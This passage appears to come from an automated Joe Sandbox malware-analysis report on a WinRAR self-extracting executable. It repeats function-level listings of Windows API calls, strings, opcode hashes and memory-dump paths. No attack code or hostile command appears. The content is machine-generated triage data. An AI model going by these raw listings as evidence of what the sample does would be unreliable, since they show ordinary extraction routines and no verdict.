                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                    • API String ID: 0-56093855
                                                                                                                                    • Opcode ID: b10d4993f298bcce655dac8d16b6236996561127ff32afaf56811a20c2021335
                                                                                                                                    • Instruction ID: c389f4b1af52bab96a1748723b552c50b3561816acaf610474f38ec0ff65fb67
                                                                                                                                    • Opcode Fuzzy Hash: b10d4993f298bcce655dac8d16b6236996561127ff32afaf56811a20c2021335
                                                                                                                                    • Instruction Fuzzy Hash: 18018076604245AFCB339F55FC44A967FBDEF09384F018425E90982230C6359850DBA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0036E2E8: _swprintf.LIBCMT ref: 0036E30E
                                                                                                                                      • Part of subcall function 0036E2E8: _strlen.LIBCMT ref: 0036E32F
                                                                                                                                      • Part of subcall function 0036E2E8: SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
                                                                                                                                      • Part of subcall function 0036E2E8: GetWindowRect.USER32(?,?), ref: 0036E3C9
                                                                                                                                      • Part of subcall function 0036E2E8: GetClientRect.USER32(?,?), ref: 0036E3D5
                                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                    • SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                    • String ID: 7$0
                                                                                                                                    • API String ID: 2622349952-1435763450
                                                                                                                                    • Opcode ID: b18523b68ff260ea5601267cb48624e0eb53ac335fe25340e8d27dedd5730770
                                                                                                                                    • Instruction ID: b703684590a50d98e9b605fccc6cfec653ba1334f19fdffbc5de775c02dbc63e
                                                                                                                                    • Opcode Fuzzy Hash: b18523b68ff260ea5601267cb48624e0eb53ac335fe25340e8d27dedd5730770
                                                                                                                                    • Instruction Fuzzy Hash: 70F0AF38104288AADF572F608C0DBEA3B6DAF05344F0DC514FC4794AA9CBB4C994EB10
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                    • Instruction ID: afea6cf21dd785ae498077b268636685315f7e200bc5196617184100474856bd
                                                                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                    • Instruction Fuzzy Hash: 33A12672A043869FDB27AF68C8817BEBBE5EF55310F2D45EAE4859B281C2398941C750
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00367F69,?,?,?), ref: 0036A3FA
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00367F69,?), ref: 0036A43E
                                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00367F69,?,?,?,?,?,?,?), ref: 0036A4BF
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00367F69,?,?,?,?,?,?,?,?,?,?), ref: 0036A4C6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2287278272-0
                                                                                                                                    • Opcode ID: c4100a60ca9a30e2e468f4cc7060764aea05cc9772f97b3e23b4816d33290b50
                                                                                                                                    • Instruction ID: 4da685a10fc9ce6a62dee5796f2c50f789b44c1fad885e0a505a3bfbc66b2e88
                                                                                                                                    • Opcode Fuzzy Hash: c4100a60ca9a30e2e468f4cc7060764aea05cc9772f97b3e23b4816d33290b50
                                                                                                                                    • Instruction Fuzzy Hash: 5041E1311487819AE733DF24DC45F9EBBE8AB80700F148919B5E1A7284DAA49A489F53
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003891E0,?,00000000,?,00000001,?,?,00000001,003891E0,?), ref: 0038C9D5
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038CA5E
                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00386CBE,?), ref: 0038CA70
                                                                                                                                    • __freea.LIBCMT ref: 0038CA79
                                                                                                                                      • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                    • Opcode ID: 1768a04446176ae91eaaa77b549aced2d22144a628ade952b84a1337d5edc1b8
                                                                                                                                    • Instruction ID: 9cbad64e0948b8b8f18a8cd185a7ec2e514e46a91264e4a5712d19df123d5084
                                                                                                                                    • Opcode Fuzzy Hash: 1768a04446176ae91eaaa77b549aced2d22144a628ade952b84a1337d5edc1b8
                                                                                                                                    • Instruction Fuzzy Hash: 18318072A1021AABDF2AEF74DC45DAE7BA5EB41310F1541A9FC04EA250E739DD50CBA0
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 0037A666
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037A675
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037A683
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0037A691
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: 92932e0be56825ec1dbc6a9539849a0f87c15615bf4575bc6dce35041f813b78
                                                                                                                                    • Instruction ID: fd397b00933a07a31c12c01f60d7713a8bc596976ea81e9502e8557560fc7849
                                                                                                                                    • Opcode Fuzzy Hash: 92932e0be56825ec1dbc6a9539849a0f87c15615bf4575bc6dce35041f813b78
                                                                                                                                    • Instruction Fuzzy Hash: 8BE0EC33942B31A7D2636B61AC0DF8A3E5CEB0AB52F418101FA06D6190DB6496008BA1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcschr
                                                                                                                                    • String ID: .lnk$d7
                                                                                                                                    • API String ID: 2691759472-501123111
                                                                                                                                    • Opcode ID: 9fbbc73040cf6f267ff47a6f5b1cc75bd02c77fd69b6e75634c810c334e89fa2
                                                                                                                                    • Instruction ID: 9d631afb3241bcaa25d0fb0a15328017d4a29417a695da9ecbf94eed46b42f26
                                                                                                                                    • Opcode Fuzzy Hash: 9fbbc73040cf6f267ff47a6f5b1cc75bd02c77fd69b6e75634c810c334e89fa2
                                                                                                                                    • Instruction Fuzzy Hash: 0CA13F7290012996DF36DBA0CD45EFA73FCAF44304F08C5A6E50DE7141EE789A858F60
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 003675E3
                                                                                                                                      • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                                                                      • Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036777F
                                                                                                                                      • Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                                                                      • Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                    • String ID: :
                                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                                    • Opcode ID: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
                                                                                                                                    • Instruction ID: af77dee9b06b85dac19ec659d013d6712748f5d12c9cc128dc8f72dfdb494042
                                                                                                                                    • Opcode Fuzzy Hash: d635e1826372bd39b2fa43cfcdb2927d4f8bb8162f58e11fd48476a2e9de408e
                                                                                                                                    • Instruction Fuzzy Hash: BF417071800258A9EB36EB64CC55EEEB37CAF45300F40C096B60AAB196DB745F84CF60
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcschr
                                                                                                                                    • String ID: *
                                                                                                                                    • API String ID: 2691759472-163128923
                                                                                                                                    • Opcode ID: 5e576a3817ff3beeffb419839b83b97e5c1678a7bea92e2a062dae2141d6bb5e
                                                                                                                                    • Instruction ID: 32f21c07aa1e3d7bfe33f20ce7763ba7297c14eafeb5ab0b3d0166369af801b1
                                                                                                                                    • Opcode Fuzzy Hash: 5e576a3817ff3beeffb419839b83b97e5c1678a7bea92e2a062dae2141d6bb5e
                                                                                                                                    • Instruction Fuzzy Hash: 68310B362443019ACA33AE568902677F3E8DF91B50F16C41DF988D714BEF668DC29B61
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: }
                                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                                    • Opcode ID: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
                                                                                                                                    • Instruction ID: c8ba408154312c8094c68807685e20ad0a75dfb22302ca6dfff685e77ea517e9
                                                                                                                                    • Opcode Fuzzy Hash: 4e0ae7af32abbcc7c7faea89f3610a6be2924457a7c1504902a4c93dfcc2221b
                                                                                                                                    • Instruction Fuzzy Hash: FA21D47290430A5AD733EA64D845F6BF3ECDF82764F11442AF548C7141E778E94883A2
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
                                                                                                                                      • Part of subcall function 0036F2C5: GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4
                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0036F33E), ref: 0036F3D2
                                                                                                                                    Strings
                                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0036F3CA
                                                                                                                                    • CryptProtectMemory failed, xrefs: 0036F389
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                                    • Opcode ID: 25b2b885e896cf2e64aed38795ed5aba48416d310eb94924c3f6954ad71f51eb
                                                                                                                                    • Instruction ID: 0c164936150de98bf4dd0e09e7e5cd272ecb00d44e67134e0ad36fdcbf56e868
                                                                                                                                    • Opcode Fuzzy Hash: 25b2b885e896cf2e64aed38795ed5aba48416d310eb94924c3f6954ad71f51eb
                                                                                                                                    • Instruction Fuzzy Hash: E5112635A01629AFDF139F24EC46A6E3758FF01760F21C126FC416F359DA749D018790
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00371160,?,00000000,00000000), ref: 00371043
                                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0037108A
                                                                                                                                      • Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54
                                                                                                                                      • Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E0A
                                                                                                                                      • Part of subcall function 00366DCB: _wcschr.LIBVCRUNTIME ref: 00366E19
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                                                    • Opcode ID: 306c4f597524beda00cfb6f3e86671d1aa01ccd4940dcef51ebe931c646cfb21
                                                                                                                                    • Instruction ID: 8111aeb1f1fb66788c6c5d643f070ed42a21f2646c2df8c805eceb0b8759c50e
                                                                                                                                    • Opcode Fuzzy Hash: 306c4f597524beda00cfb6f3e86671d1aa01ccd4940dcef51ebe931c646cfb21
                                                                                                                                    • Instruction Fuzzy Hash: FE01AEB63443496FD7379F689C92F77735CEB41751F10402EF58756284CEA16C854624
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcschr
                                                                                                                                    • String ID: <99$?*<>|"
                                                                                                                                    • API String ID: 2691759472-236475344
                                                                                                                                    • Opcode ID: eb51ca34d9504b5fa860e8b6f229893673f48e0be514ee34f39b50551d91bf62
                                                                                                                                    • Instruction ID: 2ee43fba1507d3ad25a6d780a1e9cdad5c42f0e3acbba9ac75588cbdd91e5529
                                                                                                                                    • Opcode Fuzzy Hash: eb51ca34d9504b5fa860e8b6f229893673f48e0be514ee34f39b50551d91bf62
                                                                                                                                    • Instruction Fuzzy Hash: C0F0A457A69741C5C7322F299801732F3E8EF95734F36A81EE5C5872C6E6A2C8C08665
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: Software\WinRAR SFX$7
                                                                                                                                    • API String ID: 176396367-33624352
                                                                                                                                    • Opcode ID: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
                                                                                                                                    • Instruction ID: 4edb5e6122842190707c9f1d0d8707a3f723702f4868c434b93280547c3c609a
                                                                                                                                    • Opcode Fuzzy Hash: bac4b9d894ea9d4da91fcff80c8bd91b54846b916c65d4b11812561bc0b1b3fc
                                                                                                                                    • Instruction Fuzzy Hash: B0018432500128BAEF339B51DC09FDF7F7CEF09751F008051B50AA5060D7B45A88C7A1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                                                                      • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FE5
                                                                                                                                      • Part of subcall function 00371FDD: _wcslen.LIBCMT ref: 00371FF6
